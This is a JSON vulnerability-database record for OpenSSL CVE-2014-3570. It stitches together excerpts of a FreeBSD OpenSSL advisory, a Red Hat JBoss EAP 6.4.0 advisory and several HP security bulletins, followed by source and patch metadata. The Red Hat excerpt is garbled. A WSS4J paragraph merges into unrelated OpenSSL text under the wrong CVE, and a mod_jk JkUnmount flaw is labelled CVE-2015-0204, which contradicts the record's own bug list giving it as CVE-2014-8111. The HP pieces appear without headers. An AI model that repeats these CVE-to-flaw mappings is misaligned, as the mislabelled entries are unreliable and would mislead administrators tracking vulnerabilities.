9.3-STABLE)\n 2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)\n 2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)\n 2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)\nCVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572\n CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nI. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. Problem Description\n\nA carefully crafted DTLS message can cause a segmentation fault in OpenSSL\ndue to a NULL pointer dereference. [CVE-2014-3571]\n\nA memory leak can occur in the dtls1_buffer_record function under certain\nconditions. [CVE-2015-0206]\n\nWhen OpenSSL is built with the no-ssl3 option and a SSL v3 ClientHello is\nreceived the ssl method would be set to NULL which could later result in\na NULL pointer dereference. [CVE-2014-3569] This does not affect\nFreeBSD\u0027s default build. \n\nAn OpenSSL client will accept a handshake using an ephemeral ECDH\nciphersuite using an ECDSA certificate if the server key exchange message\nis omitted. [CVE-2014-3572]\n\nAn OpenSSL client will accept the use of an RSA temporary key in a non-export\nRSA key exchange ciphersuite. [CVE-2015-0204]\n\nAn OpenSSL server will accept a DH certificate for client authentication\nwithout the certificate verify message. [CVE-2015-0205]\n\nOpenSSL accepts several non-DER-variations of certificate signature\nalgorithm and signature encodings. OpenSSL also does not enforce a\nmatch between the signature algorithm between the signed and unsigned\nportions of the certificate. [CVE-2014-8275]\n\nBignum squaring (BN_sqr) may produce incorrect results on some\nplatforms, including x86_64. [CVE-2014-3570]\n\nIII. Impact\n\nAn attacker who can send a carefully crafted DTLS message can cause server\ndaemons that uses OpenSSL to crash, resulting a Denial of Service. \n[CVE-2014-3571]\n\nAn attacker who can send repeated DTLS records with the same sequence number\nbut for the next epoch can exhaust the server\u0027s memory and result in a Denial of\nService. [CVE-2015-0206]\n\nA server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]\n\nA server could present a weak temporary key and downgrade the security of\nthe session. [CVE-2015-0204]\n\nA client could authenticate without the use of a private key. This only\naffects servers which trust a client certificate authority which issues\ncertificates containing DH keys, which is extremely rare. [CVE-2015-0205]\n\nBy modifying the contents of the signature algorithm or the encoding of\nthe signature, it is possible to change the certificate\u0027s fingerprint. \n\nThis does not allow an attacker to forge certificates, and does not\naffect certificate verification or OpenSSL servers/clients in any\nother way. It also does not affect common revocation mechanisms. Only\ncustom applications that rely on the uniqueness of the fingerprint\n(e.g. certificate blacklists) may be affected. [CVE-2014-8275]\n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 8.4 and FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 10.0]\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc\n# gpg --verify openssl-10.1.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r276865\nreleng/8.4/ r277195\nstable/9/ r276865\nreleng/9.3/ r277195\nstable/10/ r276864\nreleng/10.0/ r277195\nreleng/10.1/ r277195\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://www.openssl.org/news/secadv_20150108.txt\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:01.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.1.1 (FreeBSD)\n\niQIcBAEBCgAGBQJUtuEaAAoJEO1n7NZdz2rnQCcP/A19v5HUUhjz5nMbUumRwAmB\nQCxNKEy6SbAuxtIwGNYJyyxKIK3R9vTHwlgyQZVb4q8FgMHcu4yABeRfov10mO5Q\nU7RkLOJyca6eqEngkrh+AFfbhqfxtccIMUQkDdegsQcqZd2Ya0VeNfjA8H0XIDoL\nJSEoCifmxjv6v8ZcpugahsUOBmEWx+vyHJUSPVSv/AsLubzV3hqi4iLpzLky3/dR\n4LHGzPny07NkGPVqOBU7mjTs76SzCTS2c4NIVfvbphx8UojMvREbZ8ogCMEVGBXY\nfIWesi7Y6lhqbSgWj1EXyZF9NTo/Z4nr7Oh1ER5VSAfmhZAdyhEEEGQrg4Jq0VL3\nDJ1Y35Up79xXmVjB14COxodI5UO+55wWnXb8r/zy/eh+wv0sHwlTz56wxo7SxAOa\nxOrQj0VJ7zghLhBO7azacbVYIKpfQkJafb7XRUOqu4wt2y3/jeL+0UkWJnNMROrq\naQUB6SdGUVDwQsmodgF0rsGcQYXhaQBPu4KQo8yG8+rpqc2zewi537BJr/PWJvH0\nsJ6yYcD7VGyIleVRDpxsg7uBWelnGn+AqHignbyUcic4j/N9lYlF00AVgka2TdOp\ni5eZtp7m95v53S4fEX2HGwWpOv+AfCrSKQZGpvdNx+9JyD3LyOvFBxs4k0oZWa6J\n6FLFZ38YkLcUIzW6I6Kc\n=ztFk\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.0 update\nAdvisory ID: RHSA-2015:0849-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0849.html\nIssue date: 2015-04-16\nCVE Names: CVE-2014-3570 CVE-2014-3586 CVE-2014-8111 \n CVE-2015-0204 CVE-2015-0226 CVE-2015-0227 \n CVE-2015-0277 \n=====================================================================\n\n1. Summary:\n\nUpdated packages that provide Red Hat JBoss Enterprise Application Platform\n6.4.0, and fix multiple security issues, several bugs, and add various\nenhancements, are now available from the Red Hat Customer Portal. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nIt was found that a prior countermeasure in Apache WSS4J for\nBleichenbacher\u0027s attack on XML Encryption (CVE-2011-2487) threw an\nexception that permitted an attacker to determine the failure of the\nattempted attack, thereby leaving WSS4J vulnerable to the attack. \nThe original flaw allowed a remote attacker to recover the entire plain\ntext form of a symmetric key. (CVE-2015-0226)\n\nA flaw was found in the way PicketLink\u0027s Service Provider and Identity\nProvider handled certain requests. A remote attacker could use this flaw to\nlog to a victim\u0027s account via PicketLink. (CVE-2015-0277)\n\nIt was discovered that a JkUnmount rule for a subtree of a previous JkMount\nrule could be ignored. This could allow a remote attacker to potentially\naccess a private artifact in a tree that would otherwise not be accessible\nto them. (CVE-2015-0204)\n\nIt was found that Apache WSS4J permitted bypass of the\nrequireSignedEncryptedDataElements configuration property via XML Signature\nwrapping attacks. A remote attacker could use this flaw to modify the\ncontents of a signed request. This flaw could\npossibly affect certain OpenSSL library functionality, such as RSA\nblinding. Note that this issue occurred rarely and with a low probability,\nand there is currently no known way of exploiting it. (CVE-2014-3570)\n\nIt was found that the Command Line Interface, as provided by Red Hat\nEnterprise Application Platform, created a history file named\n.jboss-cli-history in the user\u0027s home directory with insecure default file\npermissions. This could allow a malicious local user to gain information\notherwise not accessible to them. (CVE-2014-3586)\n\nThe CVE-2015-0277 issue was discovered by Ondrej Kotek of Red Hat. \n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.4.0 Release Notes,\nlinked to in the References. \n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 as provided\nfrom the Red Hat Customer Portal are advised to apply this update. \nThe JBoss server process must be restarted for the update to take effect. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying this update, back up your\nexisting Red Hat JBoss Enterprise Application Platform installation and\ndeployed applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n1126687 - CVE-2014-3586 JBoss AS CLI: Insecure default permissions on history file\n1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK)\n1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results\n1182591 - CVE-2014-8111 Tomcat mod_jk: information leak due to incorrect JkMount/JkUnmount directives processing\n1191446 - CVE-2015-0226 wss4j: Apache WSS4J is vulnerable to Bleichenbacher\u0027s attack (incomplete fix for CVE-2011-2487)\n1191451 - CVE-2015-0227 wss4j: Apache WSS4J doesn\u0027t correctly enforce the requireSignedEncryptedDataElements property\n1194832 - CVE-2015-0277 PicketLink: SP does not take Audience condition of a SAML assertion into account\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3570\nhttps://access.redhat.com/security/cve/CVE-2014-3586\nhttps://access.redhat.com/security/cve/CVE-2014-8111\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2015-0226\nhttps://access.redhat.com/security/cve/CVE-2015-0227\nhttps://access.redhat.com/security/cve/CVE-2015-0277\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=appplatform\u0026version=6.4\nhttps://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. \n\nReferences:\n\n CVE-2014-8275 Cryptographic Issues (CWE-310)\n CVE-2014-3569 Remote Denial of Service (DoS)\n CVE-2014-3570 Cryptographic Issues (CWE-310)\n CVE-2014-3571 Remote Denial of Service (DoS)\n CVE-2014-3572 Cryptographic Issues (CWE-310)\n CVE-2015-0204 Cryptographic Issues (CWE-310)\n SSRT101934\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP SSL for OpenVMS: All versions prior to 1.4-502. \n\n HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the\nfollowing locations:\n\n - HP SSL for OpenVMS website:\n\n http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\n - HP Support Center website:\n\n https://h20566.www2.hp.com/portal/site/hpsc/patch/home\n\n Note: Login using your HP Passport account. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2014-3570" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "BID", "id": "71939" }, { "db": "VULMON", "id": "CVE-2014-3570" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131471" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3570", "trust": 3.7 }, { "db": "JUNIPER", "id": "JSA10679", "trust": 1.4 }, { "db": "BID", "id": "71939", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU91828320", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU98974537", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007551", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.4252", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201501-160", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-3570", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133318", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131359", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129973", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131471", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133316", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131408", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132763", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3570" }, { "db": "BID", "id": "71939" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131471" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "CNNVD", "id": "CNNVD-201501-160" }, { "db": "NVD", "id": "CVE-2014-3570" } ] }, "id": "VAR-201501-0434", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.36198661599999993 }, "last_update_date": "2024-06-14T21:15:22.926000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "title": "HT204659", "trust": 0.8, "url": "http://support.apple.com/en-us/ht204659" }, { "title": "HT204659", "trust": 0.8, 